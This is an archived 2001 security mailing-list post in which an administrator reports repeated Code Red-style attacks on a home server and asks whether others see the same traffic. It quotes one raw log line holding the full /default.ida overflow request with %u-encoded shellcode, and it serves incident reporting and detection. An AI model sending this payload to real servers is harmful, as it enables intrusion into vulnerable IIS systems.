Hi all, Beginning at 14:03 GMT and 18:57 continuing until Aug. 4, 2001, I have seen the following entry 65 times against my home server: 2001-08-04 18:47:11 24.147.178.221 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 604 3818 HTTP/1.0 - - Note that the character used is X instead of N as is typically seen in the Code Red worm. The code inserted, however, appears to be the same. All of the attacks have come from 24.x.x.x IP addresses, which usually indicate home cable modem users. Most of these appear be from Windows machines. Has anyone else seen this traffic? Michael Katz mikeat_private Responsible Solutions, Ltd. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:50:45 PDT